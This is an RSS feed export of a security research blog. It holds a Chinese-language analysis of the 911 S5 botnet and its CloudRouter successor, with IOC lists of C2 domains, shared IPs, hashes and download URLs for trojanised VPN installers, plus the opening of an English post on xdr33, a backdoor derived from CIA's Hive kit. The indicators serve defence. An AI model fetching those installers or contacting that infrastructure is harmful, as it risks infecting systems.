<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0" xmlns:media="http://search.yahoo.com/mrss/"><channel><title><![CDATA[360 Netlab Blog - Network Security Research Lab at 360]]></title><description><![CDATA[Network Security Research Lab at 360]]></description><link>https://blog.netlab.360.com/</link><image><url>https://blog.netlab.360.com/favicon.png</url><title>360 Netlab Blog - Network Security Research Lab at 360</title><link>https://blog.netlab.360.com/</link></image><generator>Ghost 5.76</generator><lastBuildDate>Sat, 07 Mar 2026 12:31:55 GMT</lastBuildDate><atom:link href="https://blog.netlab.360.com/rss/" rel="self" type="application/rss+xml"/><ttl>60</ttl><item><title><![CDATA[僵尸网络911 S5的数字遗产]]></title><description><![CDATA[<h1 id="%E6%A6%82%E8%BF%B0">&#x6982;&#x8FF0;</h1><p>2024&#x5E74;5&#x6708;29&#x65E5;&#xFF0C;&#x7F8E;&#x56FD;&#x53F8;&#x6CD5;&#x90E8;&#x53D1;&#x5E03;&#x901A;&#x544A;&#xFF0C;&#x58F0;&#x79F0;&#x5176;&#x6267;&#x6CD5;&#x6D3B;&#x52A8;&#x6467;&#x6BC1;&#x4E86;&quot;&#x53F2;&#x4E0A;&#x6700;&#x5927;&#x7684;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&quot; 911 S5&#xFF0C;&#x67E5;&#x5C01;&#x4E86;&#x76F8;&#x5173;&#x57DF;&#x540D;</p>]]></description><link>https://blog.netlab.360.com/911s5/</link><guid isPermaLink="false">66696e4e19c09c000719239e</guid><category><![CDATA[Botnet]]></category><category><![CDATA[911s5]]></category><dc:creator><![CDATA[lvxing]]></dc:creator><pubDate>Fri, 14 Jun 2024 09:20:11 GMT</pubDate><content:encoded><![CDATA[<h1 id="%E6%A6%82%E8%BF%B0">&#x6982;&#x8FF0;</h1><p>2024&#x5E74;5&#x6708;29&#x65E5;&#xFF0C;&#x7F8E;&#x56FD;&#x53F8;&#x6CD5;&#x90E8;&#x53D1;&#x5E03;&#x901A;&#x544A;&#xFF0C;&#x58F0;&#x79F0;&#x5176;&#x6267;&#x6CD5;&#x6D3B;&#x52A8;&#x6467;&#x6BC1;&#x4E86;&quot;&#x53F2;&#x4E0A;&#x6700;&#x5927;&#x7684;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&quot; 911 S5&#xFF0C;&#x67E5;&#x5C01;&#x4E86;&#x76F8;&#x5173;&#x57DF;&#x540D;&#xFF0C;&#x5E76;&#x4E14;&#x902E;&#x6355;&#x4E86;&#x5176;&#x7BA1;&#x7406;&#x5458;YunHe Wang&#x3002;Wang&#x53CA;&#x5176;&#x540C;&#x4F19;&#x901A;&#x8FC7;&#x521B;&#x5EFA;&#x5E76;&#x5206;&#x53D1;&#x5305;&#x542B;&#x6076;&#x610F;&#x4EE3;&#x7801;&#x7684;&#x514D;&#x8D39;VPN&#x7A0B;&#x5E8F;&#x611F;&#x67D3;&#x7528;&#x6237;&#xFF0C;&#x5E76;&#x4E14;&#x5728;&#x540D;&#x4E3A;911 S5&#x7684;&#x4F4F;&#x5B85;&#x4EE3;&#x7406;&#x670D;&#x52A1;&#x4E2D;&#x51FA;&#x552E;&#x5BF9;&#x88AB;&#x611F;&#x67D3;&#x8BBE;&#x5907;&#x6784;&#x6210;&#x7684;&#x4EE3;&#x7406;&#x7F51;&#x7EDC;&#x7684;&#x8BBF;&#x95EE;&#x6743;&#x3002;</p><p>&#x6309;&#x7167;360&#x5A01;&#x80C1;&#x60C5;&#x62A5;&#x4E2D;&#x5FC3;&#x7684;&#x5206;&#x6790;&#xFF0C;911S5&#x4ECE;2014&#x5E74;&#x5F00;&#x59CB;&#x8FD0;&#x8425;&#xFF0C;&#x5230;2022&#x5E74;7&#x6708;&#x5173;&#x505C;&#xFF0C;&#x5728;2023&#x5E74;10&#x6708;&#x53C8;&#x6447;&#x8EAB;&#x4E00;&#x53D8;&#xFF0C;&#x5316;&#x540D;CloudRouter&#x7EE7;&#x7EED;&#x5176;&#x80AE;&#x810F;&#x751F;&#x610F;&#xFF0C;&#x7EC8;&#x4E8E;&#x5728;2024&#x5E74;5&#x6708;&#x88AB;&#x591A;&#x56FD;&#x8054;&#x5408;&#x6267;&#x6CD5;&#x6467;&#x6BC1;&#x3002;911S5&#x7684;&#x50F5;&#x5C38;&#x7F51;&#x7EDC;&#x8FD0;&#x884C;&#x65F6;&#x95F4;&#x957F;&#x3001;&#x6D89;&#x53CA;&#x591A;&#x4E2A;&#x56FD;&#x5BB6;&#x7684;19M&#x4E2A;IP&#x5730;&#x5740;&#x3001;&#x884C;&#x4E3A;&#x9AD8;&#x8C03;&#xFF0C;&#x867D;&#x7136;&#x7ECF;&#x8FC7;&#x6267;&#x6CD5;&#x884C;&#x52A8;&#x540E;&#x5927;&#x52BF;&#x5DF2;&#x53BB;&#xFF0C;&#x4F46;&#x662F;&#x5176;&#x6570;&#x5B57;&#x9057;&#x4EA7;&#x4ECD;&#x7136;&#x5BF9;&#x7F51;&#x7EDC;&#x7A7A;&#x95F4;&#x6784;&#x6210;&#x4E86;&#x73B0;&#x5B9E;&#x4E14;&#x663E;&#x8457;&#x7684;&#x5A01;&#x80C1;&#xFF0C;&#x4E0B;&#x6587;&#x662F;&#x6211;&#x4EEC;&#x5BF9;&#x5A01;&#x80C1;&#x5206;&#x6790;&#x7684;&#x7ED3;&#x679C;&#x3002;</p><h1 id="%E2%80%9C%E7%A9%BA%E6%89%8B%E5%A5%97%E7%99%BD%E7%8B%BC%E2%80%9D%E7%9A%84911-s5">&#x201C;&#x7A7A;&#x624B;&#x5957;&#x767D;&#x72FC;&#x201D;&#x7684;911 S5</h1><p>911S5&#x51FA;&#x552E;&#x7684;&#x4EE3;&#x7406;&#x670D;&#x52A1;&#x80CC;&#x540E;&#x662F;&#x6570;&#x5343;&#x4E07;&#x88AB;&#x611F;&#x67D3;&#x7684;&#x8BBE;&#x5907;&#x3002;&#x53D7;&#x5BB3;&#x8005;&#x4E3B;&#x52A8;&#x6216;&#x88AB;&#x52A8;&#x4E0B;&#x8F7D;&#x6346;&#x7ED1;&#x4E86;&#x6076;&#x610F;&#x4EE3;&#x7801;&#x7684;&#x8F6F;&#x4EF6;&#x3001;&#x514D;&#x8D39;VPN&#x7A0B;&#x5E8F;&#x7B49;&#x3002;&#x5728;&#x7A0B;&#x5E8F;&#x542F;&#x52A8;&#x540E;&#xFF0C;&#x6076;&#x610F;&#x4EE3;&#x7801;&#x5C06;&#x4F1A;&#x521B;&#x5EFA;&#x6301;&#x4E45;&#x5316;&#x670D;&#x52A1;&#x4F5C;&#x4E3A;&#x540E;&#x95E8;&#xFF0C;&#x4E3A;911S5&#x5BA2;&#x6237;&#x63D0;&#x4F9B;&#x4EE3;&#x7406;&#x670D;&#x52A1;&#x3002;</p><p>&#x5728;2023&#x5E74;&#x4EE5;&#x524D;&#xFF0C;911S5&#x4F7F;&#x7528;&#x7684;&#x514D;&#x8D39;VPN&#x5305;&#x62EC;:ProxyGate&#x3001;MaskVPN&#x3001;DewVPN&#x4E0E;ShineVPN&#x3002;&#x6211;&#x4EEC;&#x89C2;&#x5BDF;&#x5230;&#x6700;&#x65E9;&#x51FA;&#x73B0;&#x7684;VPN&#x7A0B;&#x5E8F;&#x662F;ProxyGate&#xFF0C;&#x5728;2016&#x5E74;&#x81F3;2020&#x5E74;&#x95F4;&#x6D3B;&#x8DC3;&#x3002;</p><h2 id="911s5%E4%B8%8Evpn%E7%A8%8B%E5%BA%8F%E7%9A%84%E5%BC%BA%E5%85%B3%E8%81%94">911S5&#x4E0E;VPN&#x7A0B;&#x5E8F;&#x7684;&#x5F3A;&#x5173;&#x8054;</h2><h3 id="%E5%85%B1%E5%90%8C%E7%9A%84%E5%9F%BA%E7%A1%80%E8%AE%BE%E6%96%BD">&#x5171;&#x540C;&#x7684;&#x57FA;&#x7840;&#x8BBE;&#x65BD;</h3><p>&#x5C06;911S5&#x4E0E;&#x4E00;&#x4F17;&#x514D;&#x8D39;VPN&#x5173;&#x8054;&#x8D77;&#x6765;&#x7684;&#x5173;&#x952E;&#x6027;&#x8BC1;&#x636E;&#x5C31;&#x662F;&#x5B83;&#x4EEC;&#x5171;&#x7528;&#x4E86;&#x4E00;&#x90E8;&#x5206;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x3002;&#x6211;&#x4EEC;&#x6CE8;&#x610F;&#x5230;&#xFF0C;<code>911.re</code>&#x3001;<code>searchsafe.com</code>&#x3001;<code>maskvpn.org</code>&#x3001;<code>proxygate</code>&#x3001;<code>911.gg</code>&#x3001;<code>dewvpn.com</code>&#x7684;&#x7535;&#x5B50;&#x90AE;&#x4EF6;&#x670D;&#x52A1;&#x90FD;&#x66FE;&#x88AB;&#x89E3;&#x6790;&#x5230;&#x540C;&#x4E00;&#x4E2A;&#x670D;&#x52A1;&#x5668;:<code>173.244.211.96</code>&#xFF0C;&#x8BC1;&#x660E;911S5&#x548C;&#x7279;&#x5B9A;&#x514D;&#x8D39;VPN&#x7A0B;&#x5E8F;&#x62E5;&#x6709;&#x5171;&#x540C;&#x7684;&#x8FD0;&#x8425;&#x8005;&#x3002;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2024/06/image.png" class="kg-image" alt loading="lazy" width="2000" height="1052" srcset="https://blog.netlab.360.com/content/images/size/w600/2024/06/image.png 600w, https://blog.netlab.360.com/content/images/size/w1000/2024/06/image.png 1000w, https://blog.netlab.360.com/content/images/size/w1600/2024/06/image.png 1600w, https://blog.netlab.360.com/content/images/size/w2400/2024/06/image.png 2400w" sizes="(min-width: 720px) 720px"></figure><p>&#x66F4;&#x591A;&#x6570;&#x636E;&#xFF0C;&#x8BF7;&#x67E5;&#x770B;&#x6700;&#x540E;&#x4E00;&#x90E8;&#x5206;&quot;&#x5171;&#x7528;IP&quot;&#x3002;</p><h3 id="%E7%9B%B8%E4%BC%BC%E7%9A%84%E6%A0%B7%E6%9C%AC%E8%A1%8C%E4%B8%BA">&#x76F8;&#x4F3C;&#x7684;&#x6837;&#x672C;&#x884C;&#x4E3A;</h3><p>MaskVPN&#x3001;DewVPN&#x4EE5;&#x53CA;ShineVPN&#x62E5;&#x6709;&#x76F8;&#x4F3C;&#x7684;&#x7F16;&#x7801;&#x65B9;&#x5F0F;&#x3001;&#x8FDB;&#x7A0B;&#x94FE;&#x7ED3;&#x6784;&#xFF1A;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://blog.netlab.360.com/content/images/2024/06/image-3.png" class="kg-image" alt loading="lazy" width="1952" height="919" srcset="https://blog.netlab.360.com/content/images/size/w600/2024/06/image-3.png 600w, https://blog.netlab.360.com/content/images/size/w1000/2024/06/image-3.png 1000w, https://blog.netlab.360.com/content/images/size/w1600/2024/06/image-3.png 1600w, https://blog.netlab.360.com/content/images/2024/06/image-3.png 1952w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">MaskVPN&#x8FDB;&#x7A0B;&#x94FE;</span></figcaption></figure><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://blog.netlab.360.com/content/images/2024/06/image-2.png" class="kg-image" alt loading="lazy" width="1704" height="965" srcset="https://blog.netlab.360.com/content/images/size/w600/2024/06/image-2.png 600w, https://blog.netlab.360.com/content/images/size/w1000/2024/06/image-2.png 1000w, https://blog.netlab.360.com/content/images/size/w1600/2024/06/image-2.png 1600w, https://blog.netlab.360.com/content/images/2024/06/image-2.png 1704w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">DewVPN&#x8FDB;&#x7A0B;&#x94FE;</span></figcaption></figure><h1 id="%E2%80%9C%E6%AD%BB%E8%80%8C%E5%A4%8D%E7%94%9F%E2%80%9D%E7%9A%84cloudrouter">&#x201C;&#x6B7B;&#x800C;&#x590D;&#x751F;&#x201D;&#x7684;CloudRouter</h1><p>2022&#x5E74;7&#x6708;&#xFF0C;911S5&#x7684;&#x8FD0;&#x8425;&#x8005;&#x505C;&#x6B62;&#x4E86;911S5&#x7684;&#x670D;&#x52A1;&#xFF0C;&#x4F46;&#x662F;&#x5B83;&#x4EEC;&#x4E5F;&#x5E76;&#x672A;&#x86F0;&#x4F0F;&#x592A;&#x957F;&#x65F6;&#x95F4;&#x3002;2023&#x5E74;2&#x6708;&#xFF0C;911S5&#x7684;&#x7EE7;&#x4EFB;&#x8005;CloudRouter&#x88AB;&#x7814;&#x7A76;&#x4EBA;&#x5458;&#x53D1;&#x73B0;&#xFF1B;10&#x6708;&#xFF0C;CloudRouter&#x6B63;&#x5F0F;&#x53D1;&#x5E03;&#xFF0C;&#x63D0;&#x4F9B;&#x7C7B;&#x4F3C;911S5&#x7684;&#x4F4F;&#x5B85;&#x670D;&#x52A1;&#xFF0C;&#x5B83;&#x4F7F;&#x7528;PaladinVPN&#x3001;Shield&#xA0;VPN&#x611F;&#x67D3;&#x8BBE;&#x5907;&#x5E76;&#x7EE7;&#x7EED;&#x6784;&#x5EFA;&#x4EE3;&#x7406;&#x7F51;&#x7EDC;&#xFF0C;&#x6211;&#x4EEC;&#x786E;&#x8BA4;&#x8FD9;&#x662F;&#x6362;&#x6C64;&#x4E0D;&#x6362;&#x836F;&#x7684;911S5&#x3002;</p><h2 id="cloudrouter%EF%BC%8C%E6%8D%A2%E6%B1%A4%E4%B8%8D%E6%8D%A2%E8%8D%AF">CloudRouter&#xFF0C;&#x6362;&#x6C64;&#x4E0D;&#x6362;&#x836F;</h2><h3 id="%E5%85%B1%E7%94%A8%E5%9F%BA%E7%A1%80%E8%AE%BE%E6%96%BD">&#x5171;&#x7528;&#x57FA;&#x7840;&#x8BBE;&#x65BD;</h3><p>&#x4E0E;911S5&#x7C7B;&#x4F3C;&#xFF0C;<code>cloudrouter.pro</code>&#x3001;<code>paladinvpn.com</code>&#x3001;<code>shieldvpn.org</code>&#x7684;&#x7535;&#x5B50;&#x90AE;&#x4EF6;&#x670D;&#x52A1;&#x89E3;&#x6790;&#x5230;&#x4E86;&#x76F8;&#x540C;&#x7684;&#x670D;&#x52A1;&#x5668;:<code>209.126.108.53</code>&#x3002;</p><figure class="kg-card kg-image-card"><img src="https://blog.netlab.360.com/content/images/2024/06/image-1.png" class="kg-image" alt loading="lazy" width="2000" height="1319" srcset="https://blog.netlab.360.com/content/images/size/w600/2024/06/image-1.png 600w, https://blog.netlab.360.com/content/images/size/w1000/2024/06/image-1.png 1000w, https://blog.netlab.360.com/content/images/size/w1600/2024/06/image-1.png 1600w, https://blog.netlab.360.com/content/images/size/w2400/2024/06/image-1.png 2400w" sizes="(min-width: 720px) 720px"></figure><p>&#x66F4;&#x591A;&#x6570;&#x636E;&#xFF0C;&#x8BF7;&#x67E5;&#x770B;&#x6700;&#x540E;&#x4E00;&#x90E8;&#x5206;&quot;&#x5171;&#x7528;IP&quot;&#x3002;</p><h3 id="%E6%A0%B7%E6%9C%AC%E7%9A%84%E5%BC%BA%E5%85%B3%E8%81%94">&#x6837;&#x672C;&#x7684;&#x5F3A;&#x5173;&#x8054;</h3><ol><li>CloudRouter&#x4F7F;&#x7528;&#x7684;PaladinVPN&#x3001;ShineVPN&#x7684;&#x7F16;&#x7801;&#x65B9;&#x5F0F;&#x3001;&#x8FDB;&#x7A0B;&#x94FE;&#x4E0E;MaskVPN&#x3001;DewVPN&#x9AD8;&#x5EA6;&#x76F8;&#x4F3C;&#x3002;</li></ol><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://blog.netlab.360.com/content/images/2024/06/image-4.png" class="kg-image" alt loading="lazy" width="1747" height="926" srcset="https://blog.netlab.360.com/content/images/size/w600/2024/06/image-4.png 600w, https://blog.netlab.360.com/content/images/size/w1000/2024/06/image-4.png 1000w, https://blog.netlab.360.com/content/images/size/w1600/2024/06/image-4.png 1600w, https://blog.netlab.360.com/content/images/2024/06/image-4.png 1747w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">PaladinVPN&#x8FDB;&#x7A0B;&#x94FE;</span></figcaption></figure><ol start="2"><li>&#x6839;&#x636E;&#x7F8E;&#x56FD;&#x6CD5;&#x9662;&#x7684;&#x6263;&#x62BC;&#x6587;&#x4EF6;&#xFF0C;&#x5728;2023&#x5E74;8&#x6708;&#x4EFD;&#xFF0C;&#x5206;&#x6790;&#x4EBA;&#x5458;&#x89C2;&#x5BDF;&#x5230;&#x4E86;&#x4ECE;MaskVPN&#x5230;ShieldVPN&#x7684;&#x5347;&#x7EA7;&#xFF0C;&#x8BE5;&#x6587;&#x4EF6;&#x58F0;&#x79F0;ShieldVPN&#x3001;PaladinVPN&#x4E0E;<code>reachfresh.com</code>&#x901A;&#x4FE1;&#xFF0C;&#x5E76;&#x4ECE;<code>updatepanel.cc</code>&amp;<code>upgradeportal.org</code>&#x63A5;&#x53D7;&#x66F4;&#x65B0;&#x6307;&#x4EE4;&#x3002;</li></ol><h2 id="paladinvpn%E7%9A%84%E6%8E%A8%E5%B9%BF%E5%9F%9F%E5%90%8D">PaladinVPN&#x7684;&#x63A8;&#x5E7F;&#x57DF;&#x540D;</h2><p>&#x6211;&#x4EEC;&#x6CE8;&#x610F;&#x5230;&#xFF0C;&#x6709;150+&#x4E2A;&#x63A8;&#x5E7F;&#x57DF;&#x540D;&#x90FD;&#x89E3;&#x6790;&#x5230;&#x4E86;&#x540C;&#x4E00;&#x4E2A;&#x5730;&#x5740;<code>148.72.152.203</code> &#xFF0C;&#x5982;&#xFF1A;</p><pre><code>soccerstreamingvpn.com
freevpnlebanon.com
freevpnhongkong.com
freevpncuba.com
freevpnghana.com</code></pre><p>&#x8FD9;&#x4E9B;&#x7AD9;&#x70B9;&#x7684;&#x5185;&#x5BB9;&#x8BF1;&#x5BFC;&#x8BBF;&#x95EE;&#x8005;&#x524D;&#x5F80;PaladinVPN&#x76F8;&#x5173;&#x7684;&#x9875;&#x9762;&#x3002;&#x7F8E;&#x56FD;&#x6CD5;&#x9662;&#x7684;&#x4E00;&#x4EFD;&#x6263;&#x62BC;&#x6587;&#x4EF6;&#x58F0;&#x79F0;&#xFF0C;&#x5B83;&#x4EEC;&#x786E;&#x5B9A;&#x8FD9;&#x662F;&#x7531;Wang&#x7684;&#x4E00;&#x540D;&#x540C;&#x8C0B;&#x6240;&#x4E3A;&#x3002;</p><h1 id="%E5%9F%9F%E5%90%8D%E7%83%AD%E5%BA%A6">&#x57DF;&#x540D;&#x70ED;&#x5EA6;</h1><p>&#x6211;&#x4EEC;&#x5206;&#x6790;&#x4E86;911S5&#x76F8;&#x5173;&#x57DF;&#x540D;&#x7684;&#x70ED;&#x5EA6;&#x5E76;&#x7ED8;&#x5236;&#x4E86;&#x6298;&#x7EBF;&#x56FE;&#xFF0C;&#x5176;&#x4E2D;&#x7EB5;&#x8F74;&#x8868;&#x793A;&#x70ED;&#x5EA6;&#x503C;&#xFF0C;&#x8303;&#x56F4;&#x4E3A;[0,10]&#xFF0C;&#x6A2A;&#x8F74;&#x8868;&#x793A;&#x65F6;&#x95F4;&#x3002;</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://blog.netlab.360.com/content/images/2024/06/pranks.png" class="kg-image" alt loading="lazy" width="2000" height="528" srcset="https://blog.netlab.360.com/content/images/size/w600/2024/06/pranks.png 600w, https://blog.netlab.360.com/content/images/size/w1000/2024/06/pranks.png 1000w, https://blog.netlab.360.com/content/images/size/w1600/2024/06/pranks.png 1600w, https://blog.netlab.360.com/content/images/size/w2400/2024/06/pranks.png 2400w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">&#x57DF;&#x540D;&#x70ED;&#x5EA6;&#x6298;&#x7EBF;&#x56FE;</span></figcaption></figure><p>&#x5BB9;&#x6613;&#x53D1;&#x73B0;&#xFF0C;&#x5927;&#x90E8;&#x5206;&#x57DF;&#x540D;&#x7684;&#x70ED;&#x5EA6;&#x503C;&#x5728;[2,4]&#xFF0C;<sub><code>911.re</code>&#x3001;<code>911s5.com</code></sub>&#x4E24;&#x4E2A;&#x57DF;&#x540D;&#x70ED;&#x5EA6;&#x8F83;&#x9AD8;&#xFF0C;<code>911.re</code>&#x5728;&#x70ED;&#x5EA6;&#x6700;&#x9AD8;&#x65F6;&#x63A5;&#x8FD1;6&#x3002;</p><h1 id="ioc">IOC</h1><h2 id="%E5%9F%9F%E5%90%8D">&#x57DF;&#x540D;</h2><pre><code>proxygate.net
911s5.net
911.re
911.gg
911s5.org
911s5.com
maskvpn.cc
maskvpn.org
dewvpn.cc
dewvpn.com
dewvpn.net
dewvpn.org
shinevpn.org
shinevpn.com
shinevpn.co
shinevpn.net
cloudrouting.net
cloudrouter.io
cloudrouter.pro
paladinvpn.org
paladinvpn.com
shieldvpn.org
reachfresh.com
updatepanel.cc
upgradeportal.org</code></pre><h2 id="%E4%B8%8B%E8%BD%BD%E5%9F%9F%E5%90%8D%E4%B8%8Eurl">&#x4E0B;&#x8F7D;&#x57DF;&#x540D;&#x4E0E;URL</h2><pre><code>dton09jc5wlle.cloudfront.net
d2mxl8paokc6p3.cloudfront.net
d32cjgd79n340u.cloudfront.net
https://d87hw114pqw7b.cloudfront.net/dewvpn-setup.exe
https://d3d5qtzjda7oy3.cloudfront.net/paladinvpn-setup.exe
https://d2akdl6qfujxx9.cloudfront.net/paladinvpn-setup.exe
https://d1f64skmkl5mzn.cloudfront.net/paladinvpn.exe
https://d2akdl6qfujxx9.cloudfront.net/paladinvpn-setup.exe	
https://d1f64skmkl5mzn.cloudfront.net/paladinvpn.exe
https://dton09jc5w11e.cloudfront.net/paladinvpn.exe</code></pre><h2 id="%E6%A0%B7%E6%9C%AC">&#x6837;&#x672C;</h2><figure class="kg-card kg-code-card"><pre><code>1875e43e224862cbf60bffc51c96cf1a
25e627a9a583f08ffbbd60cbc276f87e
3a6995457c832ecf79be7b941bfa4d91
3e68dbd53c2df48e00f830243b35cd84
3f056ee26ac0a3d3bf0bb4570887c925</code></pre><figcaption><p><span style="white-space: pre-wrap;">PaladinVPN</span></p></figcaption></figure><figure class="kg-card kg-code-card"><pre><code>6db6b7b99a0e87f142a56e256a62ef82
fd72d909e280110cd6ccbae8e86d29e4
fc8fcf280914e20c93939ed155a68c53
026dc4084820a013ec1537ba6bab0d44
d6d577fc72559cfb133b4c02c21dc7c0</code></pre><figcaption><p><span style="white-space: pre-wrap;">ShieldVPN</span></p></figcaption></figure><h2 id="%E5%85%B1%E7%94%A8ip">&#x5171;&#x7528;IP</h2><p>&#x501F;&#x52A9;360&#x5A01;&#x80C1;&#x60C5;&#x62A5;&#x6570;&#x636E;&#x5E93;&#xFF0C;&#x6211;&#x4EEC;&#x627E;&#x5230;&#x4E86;&#x4E00;&#x6279;911S5&#x4E0D;&#x540C;&#x57DF;&#x540D;&#x5171;&#x7528;&#x7684;IP&#x5730;&#x5740;&#xFF1A;</p><pre><code>34.102.136.180
	 911s5.net
	 911s5.org
	 maskvpn.org
	 shinevpn.org
	 shinevpn.com
	 shinevpn.net
34.98.99.30
	 911s5.org
	 911s5.com
	 dewvpn.org
	 dewvpn.net
	 dewvpn.cc
	 maskvpn.cc
	 maskvpn.org
	 proxygate.net
174.139.8.2
	 911s5.org
	 911s5.com
	 www.911s5.com
	 eu.911.gg
	 911.re
	 login.911s5.net
	 userip.911s5.net
	 neibu.911s5.net
31.13.83.2
	 eu.911.gg
	 www.911.gg
	 911.gg
	 www.dewvpn.com
	 dewvpn.com
	 net.dewvpn.com
31.13.84.2
	 eu.911.gg
	 www.911.gg
	 911.gg
	 www.dewvpn.com
	 user.dewvpn.com
	 net.dewvpn.com
31.13.106.4
	 eu.911.gg
	 dewvpn.com
98.126.28.10
	 911s5.org
	 www.911s5.com
	 911s5.com
185.45.6.57
	 eu.911.gg
	 user.dewvpn.com
	 www.dewvpn.com
31.13.73.9
	 eu.911.gg
	 911.gg
	 www.911.gg
	 www.dewvpn.com
	 user.dewvpn.com
	 net.dewvpn.com
162.125.8.1
	 eu.911.gg
	 www.911.gg
	 911.gg
	 dewvpn.com
	 www.dewvpn.com
	 user.dewvpn.com
	 net.dewvpn.com
31.13.92.5
	 www.911.gg
	 eu.911.gg
	 911.gg
	 dewvpn.com
	 www.dewvpn.com
	 net.dewvpn.com
162.125.2.3
	 eu.911.gg
	 911.gg
	 www.911.gg
	 dewvpn.com
	 www.dewvpn.com
	 net.dewvpn.com
185.45.7.97
	 eu.911.gg
	 www.dewvpn.com
162.125.2.5
	 eu.911.gg
	 www.911.gg
	 911.gg
	 dewvpn.com
	 user.dewvpn.com
	 www.dewvpn.com
	 net.dewvpn.com
31.13.64.7
	 eu.911.gg
	 www.911.gg
	 911.gg
	 www.dewvpn.com
	 user.dewvpn.com
	 net.dewvpn.com
31.13.74.1
	 eu.911.gg
	 www.911.gg
	 911.gg
	 user.dewvpn.com
	 www.dewvpn.com
	 net.dewvpn.com
31.13.69.86
	 eu.911.gg
	 dewvpn.com
31.13.67.33
	 eu.911.gg
	 dewvpn.com
	 user.dewvpn.com
31.13.94.7
	 eu.911.gg
	 911.gg
	 www.911.gg
	 www.dewvpn.com
	 user.dewvpn.com
	 net.dewvpn.com
31.13.70.33
	 eu.911.gg
	 user.dewvpn.com
31.13.70.13
	 eu.911.gg
	 dewvpn.com
	 user.dewvpn.com
31.13.80.1
	 eu.911.gg
	 www.911.gg
	 911.gg
	 www.dewvpn.com
	 net.dewvpn.com
162.125.7.1
	 eu.911.gg
	 www.911.gg
	 911.gg
	 user.dewvpn.com
	 net.dewvpn.com
103.97.3.19
	 www.911.gg
	 911.gg
	 dewvpn.com
	 www.dewvpn.com
	 net.dewvpn.com
31.13.75.12
	 eu.911.gg
	 user.dewvpn.com
162.125.6.1
	 eu.911.gg
	 911.gg
	 www.911.gg
	 user.dewvpn.com
	 www.dewvpn.com
	 net.dewvpn.com
31.13.71.19
	 eu.911.gg
	 user.dewvpn.com
31.13.81.4
	 eu.911.gg
	 911.gg
	 www.911.gg
	 www.dewvpn.com
	 net.dewvpn.com
162.125.1.8
	 eu.911.gg
	 www.911.gg
	 911.gg
	 www.dewvpn.com
	 net.dewvpn.com
31.13.75.5
	 eu.911.gg
	 911.gg
	 www.911.gg
	 www.dewvpn.com
	 user.dewvpn.com
	 net.dewvpn.com
31.13.84.8
	 eu.911.gg
	 www.911.gg
	 911.gg
	 user.dewvpn.com
	 www.dewvpn.com
	 net.dewvpn.com
31.13.69.33
	 eu.911.gg
	 user.dewvpn.com
	 dewvpn.com
31.13.84.1
	 eu.911.gg
	 www.911.gg
	 911.gg
	 user.dewvpn.com
	 www.dewvpn.com
	 net.dewvpn.com
157.240.3.8
	 eu.911.gg
	 www.911.gg
	 911.gg
	 www.dewvpn.com
	 dewvpn.com
	 net.dewvpn.com</code></pre>]]></content:encoded></item><item><title><![CDATA[Heads up! Xdr33, A Variant Of CIA’s HIVE  Attack Kit Emerges]]></title><description><![CDATA[<h1 id="overview">Overview</h1>
<p>On Oct 21, 2022, 360Netlab&apos;s honeypot system captured a suspicious ELF file <code>ee07a74d12c0bb3594965b51d0e45b6f</code>, which propagated via F5 vulnerability with zero VT detection, our system observces that it communicates with IP <code>45.9.150.144</code> using SSL with <strong>forged Kaspersky certificates</strong>, this caught our attention. After further lookup,</p>]]></description><link>https://blog.netlab.360.com/headsup_xdr33_variant_of_ciahive_emeerges/</link><guid isPermaLink="false">63bcdc1f76a7a20007c96698</guid><category><![CDATA[Botnet]]></category><category><![CDATA[Backdoor]]></category><category><![CDATA[CIA HIVE]]></category><category><![CDATA[en]]></category><dc:creator><![CDATA[Alex.Turing]]></dc:creator><pubDate>Tue, 10 Jan 2023 14:00:37 GMT</pubDate><content:encoded><![CDATA[<h1 id="overview">Overview</h1>
<p>On Oct 21, 2022, 360Netlab&apos;s honeypot system captured a suspicious ELF file <code>ee07a74d12c0bb3594965b51d0e45b6f</code>, which propagated via F5 vulnerability with zero VT detection, our system observces that it communicates with IP <code>45.9.150.144</code> using SSL with <strong>forged Kaspersky certificates</strong>, this caught our attention. After further lookup, we confirmed that this sample was adapted from the leaked Hive project server source code from CIA. <strong>This is the first time we caught a variant of the CIA HIVE attack kit in the wild</strong>, and we named it <code>xdr33</code> based on its embedded Bot-side certificate <code>CN=xdr33</code>.</p>
<p>To summarize, xdr33 is a backdoor born from the CIA Hive project, its main purpose is to collect sensitive information and provide a foothold for subsequent intrusions. In terms of network communication, xdr33 uses XTEA or AES algorithm to encrypt the original traffic, and uses SSL with Client-Certificate Authentication mode enabled to further protect the traffic; in terms of function, there are two main tasks: beacon and trigger, of which beacon is periodically report sensitive information about the device to the hard-coded Beacon C2 and execute the commands issued by it, while the trigger is to monitor the NIC traffic to identify specific messages that conceal the Trigger C2, and when such messages are received, it establishes communication with the Trigger C2 and waits for the execution of the commands issued by it.</p>
<p>The functional schematic is shown below.</p>
<p><a href="https://blog.netlab.360.com/content/images/2022/12/hive_function.png"><img src="https://blog.netlab.360.com/content/images/2022/12/hive_function.png" class="kg-image"></a></p>
<p>Hive uses the <code>BEACON_HEADER_VERSION </code>macro to define the specified version, which has a value of <code>29</code> on the Master branch of the source code and a value of <code>34</code> in <code>xdr33</code>, so perhaps xdr33 has had several rounds of iterative updates already. Comparing with the HIV source code, xdr33 has been updated in the following 5 areas:</p>
<ul>
<li>New CC instructions have been added</li>
<li>Wrapping or expanding functions</li>
<li>Structs have been reordered and extended</li>
<li>Trigger message format</li>
<li>Addition of CC operations to the Beacon task</li>
</ul>
